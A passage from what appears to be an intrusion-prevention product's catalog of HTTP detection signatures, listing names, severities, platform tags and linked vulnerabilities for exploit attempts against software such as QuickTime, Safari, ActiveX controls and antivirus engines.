HTTP_SS-Apple-QuickTime-RTSP-URI-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Apple QuickTime Player detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-261-3038
Vulnerability: HTTP-Apple-QuickTime-RTSP-URI-Buffer-Overflow
Description:
Back to top

HTTP_SS-Apple-QuickTime-SMIL-File-Handling-Integer-Overflow

About this situation: Detected an attempt to exploit integer overflow vulnerability in Apple QuickTime
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS, Any Hardware, Apple QuickTime, CVE2007, Windows not specific, Mac OS not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-130-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Apple-QuickTime-SMIL-File-Handling-Integer-Overflow
Description:
Back to top

HTTP_SS-Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow
Description:
Back to top

HTTP_SS-Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption
Description:
Back to top

HTTP_SS-Apple-Safari-HTML-Image-Element-Handling-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-298-4219
Last changed: sgpkg-ips-354-4219
Vulnerability: Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
Description:
Back to top

HTTP_SS-Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-298-4219
Last changed: sgpkg-ips-298-4219
Vulnerability: Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free
Description:
Back to top

HTTP_SS-Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution
Description:
Back to top

HTTP_SS-Apple-Safari-Webkit-Floating-Point-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in Apple Safari
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-241-3038
Last changed: sgpkg-ips-256-3038
Vulnerability: Apple-Safari-Webkit-Floating-Point-Buffer-Overflow
Description:
Back to top

HTTP_SS-Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-375-4219
Vulnerability: Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution
Description:
Back to top

HTTP_SS-Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption

About this situation: Attempt to exploit a vulnerability in Apple Safari detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-367-4219
Vulnerability: Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption
Description:
Back to top

HTTP_SS-Apple-Safari-Webkit-Range-Object-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Computer Safari detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-383-4219
Vulnerability: Apple-Safari-Webkit-Range-Object-Remote-Code-Execution
Description:
Back to top

HTTP_SS-Apple-Safari-Webkit-Selections-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: Apple-Safari-Webkit-Selections-Use-After-Free
Description:
Back to top

HTTP_SS-Apple-Software-Update-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Apple Software Update detected
Context: HTTP Server Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Apple-Software-Update-Remote-Command-Execution
Description:
Back to top

HTTP_SS-Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Ask Toolbar detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Ask Toolbar, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-163-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow
Description:
Back to top

HTTP_SS-Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Astonsoft DeepBurner
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Astonsoft DeepBurner, CVE2006, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow
Description:
Back to top

HTTP_SS-AtHoc-IWSAlerts-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in AtHoc ISWAlerts ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, AtHoc IWSAlerts, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-261-3038
Vulnerability: AtHoc-IWSAlerts-ActiveX-Control-ControlFile-Buffer-Overflow
Description:
Back to top

HTTP_SS-Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Aurigma Image Uploader detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Aurigma Image Uploader, Windows not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service
Description:
Back to top

HTTP_SS-Aurigma-Image-Uploader-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Aurigma Image Uploader ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Aurigma Image Uploader, Myspace Uploader, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: Aurigma-Image-Uploader-Buffer-Overflow
Description:
Back to top

HTTP_SS-Autodesk-IDrop-ActiveX-Control-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Autodesk i-drop ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Autodesk i-drop, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-354-4219
Vulnerability: Autodesk-IDrop-ActiveX-Control-ControlFile-Buffer-Overflow
Description:
Back to top

HTTP_SS-Autodesk-Liveupdate-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in Autodesk LiveUpdate ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Autodesk Revit Architecture, Autodesk Design Review, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Autodesk-Liveupdate-ActiveX-Control-Code-Execution
Description:
Back to top

HTTP_SS-Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in KeyView IDOL Viewing SDK detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Autonomy KeyView IDOL Viewing SDK, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-247-3038
Vulnerability: Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
Description:
Back to top

HTTP_SS-Avast-AntiVirus-Engine-Lha-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ALWIL Software Avast Antivirus detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Avast Antivirus, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Avast-AntiVirus-Engine-Remote-Lha-Buffer-Overflow
Description:
Back to top

HTTP_SS-AVI-MS09-038

About this situation: A possibly malicous AVI file targeting MS09-038
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-239-3038
Vulnerability: Microsoft-Malformed-AVI-Header-Vulnerability-MS09-038
Description:
Back to top

HTTP_SS-Axis-Communications-Camera-Control-ActiveX-Object

About this situation: An usage of AXIS Communication Camera Control ActiveX Object detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, AXIS Camera Control, CVE2007, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-426-4219
Vulnerability: Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
Axis-Communications-Camera-Control-Image-Pan-Tilt-Buffer-Overflow
Description:
Back to top

HTTP_SS-Baidu-Soba-Search-Bar-File-Download-And-Execute

About this situation: Detected an attempt to arbitrary file download and execute vulnerability in Baidu Soba Search Bar
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Baidu Soba Search Bar, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Baidu-Soba-Search-Bar-File-Download-And-Execute
Description:
Back to top

HTTP_SS-BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this situation: An attempt to exploit vulnerabilities in BaoFeng Storm detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, BaoFeng Storm, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
Description:
Back to top

HTTP_SS-BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow-2

About this situation: An attempt to exploit vulnerabilities in BaoFeng Storm detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, BaoFeng Storm, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-195-2032
Last changed: sgpkg-ips-405-4219
Vulnerability: BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
Description:
Back to top

HTTP_SS-Base64-Encoded-HTML-Object

About this situation: Detected bas64 encoded HTML object
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-350-4219
Last changed: sgpkg-ips-350-4219
Description:
Back to top

HTTP_SS-BitDefender-AntiVirus-PDF-Processing-Memory-Corruption

About this situation: Detected an attempt to exploit a vulnerability in BitDefender Antivirus
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, BitDefender, BitDefender Internet Security, BitDefender Total Security, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-189-2032
Last changed: sgpkg-ips-189-2032
Vulnerability: BitDefender-AntiVirus-PDF-Processing-Memory-Corruption
Description:
Back to top

HTTP_SS-BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow

About this situation: Detected an attempt to use the vulnerable method of the BitDefender Online Scanner ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Softwin BitDefender Online Scanner, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-BitTorrent-Torrent-Metainfo-File-Download

About this situation: Detects BitTorrent .torrent file downloads
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Server Traffic
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-272-4219
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_SS-BZip2-Compressed-File-Download

About this situation: Attempt to download bzip2 compressed file detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, bzip2, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-186-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: BZip2-Compressed-File
File-Type-Identification
Description:
Back to top

HTTP_SS-CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution

About this situation: Exploit against Computer Associates eTrust Intrusion Detection detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates eTrust Intrusion Detection, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-117-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution
Description:
Back to top

HTTP_SS-CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Computer Associates eTrust PestPatrol detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates eTrust PestPatrol, CVE2009, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation

About this situation: An attempt to exploit a vulnerability in CA Host-Based Intrusion Prevention System detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA Host-Based Intrusion Prevention System, CA Internet Security Suite, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-379-4219
Vulnerability: CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation
Description:
Back to top

HTTP_SS-CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF

About this situation: Attempt to exploit a buffer overflow vulnerability in Computer Associates products detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, Computer Associates Unicenter Desktop Management Bundle, Computer Associates Unicenter Remote Control, Computer Associates Unicenter Software Delivery, Computer Associates Unicenter Asset Management, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF
Description:
Back to top

HTTP_SS-CA-Multiple-Products-gui-cm-ctrls-ActiveX-Control-Memory-Corruption

About this situation: Attempt to exploit a memory corruption vulnerability in multiple Computer Associates products detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, Computer Associates Desktop and Server Management, Computer Associates Unicenter Desktop Management Bundle, Computer Associates Unicenter Remote Control, Computer Associates Unicenter Software Delivery, Computer Associates Unicenter Asset Management, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-CA-Multiple-Products-gui_cm_ctrls-ActiveX-Control-Memory-Corruption
Description:
Back to top

HTTP_SS-Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems AnyConnect
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Cisco Systems AnyConnect, CVE2011, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution
Description:
Back to top

HTTP_SS-Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems Secure Desktop detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Cisco Secure Desktop, CVE2011, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution
Description:
Back to top

HTTP_SS-Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF

About this situation: Attempt to exploit a buffer overflow vulnerability in Cisco Webex Meeting Manager detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Cisco Webex Meeting Manager, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-166-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF
Description:
Back to top

HTTP_SS-Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation

About this situation: An attempt to exploit a vulnerability in Citrix ICA Win32 Program Neighborhood Agent detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Citrix Program Neighborhood Agent, CVE2004, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-354-4219
Vulnerability: Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation
Description:
Back to top

HTTP_SS-Citrix-Program-Neighborhood-Agent-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Citrix ICA Win32 Program Neighborhood Agent detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Citrix Program Neighborhood Agent, CVE2004, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-356-4219
Vulnerability: Citrix-Program-Neighborhood-Agent-Buffer-Overflow
Description:
Back to top

HTTP_SS-Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in ClamAV AntiVirus detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2008, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-190-2032
Last changed: sgpkg-ips-190-2032
Vulnerability: Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
Description:
Back to top

HTTP_SS-Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in ClamAV antivirus detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, ClamAV, CVE2008, Any Operating System not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-174-2032
Vulnerability: Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service
Description:
Back to top

HTTP_SS-Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in ClamAV detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-248-3038
Vulnerability: Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow
Description:
Back to top

HTTP_SS-Clamav-libclamav-PE-File-Handling-Integer-Overflow

About this situation: Crafted PE file detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Clamav-libclamav-PE-File-Handling-Integer-Overflow
Description:
Back to top

HTTP_SS-Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite

About this situation: Detected attempt to use vulnerable method of Clever Internet ActiveX Suite
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Clever Internet ActiveX Suite, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite
Description:
Back to top

HTTP_SS-CoolPlayer-Playlist-File-Handling-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in CoolPlayer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, CoolPlayer, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-172-2032
Vulnerability: CoolPlayer-Playlist-File-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-Core-Services-Memory-Corruption-CVE-2010-2561

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft XML Core Services detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-331-4219
Last changed: sgpkg-ips-348-4219
Vulnerability: Microsoft-XML-Core-Services-Memory-Corruption-CVE-2010-2561
Description:
Back to top

HTTP_SS-Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in the Creative Software AutoUpdate Engine ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Creative Software AutoUpdate, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP-Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Debian-Binary-Installation-Package-Download

About this situation: Detected a download attempt of an executable content
Context: HTTP Server Stream
Severity: 2
Tags: Ubuntu Linux, Debian GNU/Linux, Any Hardware, Debian GNU/Linux not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: Debian-Installation-Package
Description:
Back to top

HTTP_SS-DjVu-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in DjVu ActiveX Control for Microsoft Office detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, DjVu ActiveX Control for Microsoft Office, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: DjVu-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Downloader-Malware

About this situation: Downloader malware detected
Context: HTTP Server Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Spyware, Malware and Adware, TCP Server Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-367-4219
Vulnerability: Downloader-Malware
Description:
Back to top

HTTP_SS-E-Book-Systems-FlipViewer-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in E-Book Systems FlipViewer ActiveX Control detected
Context: HTTP Server Stream
Severity: 7
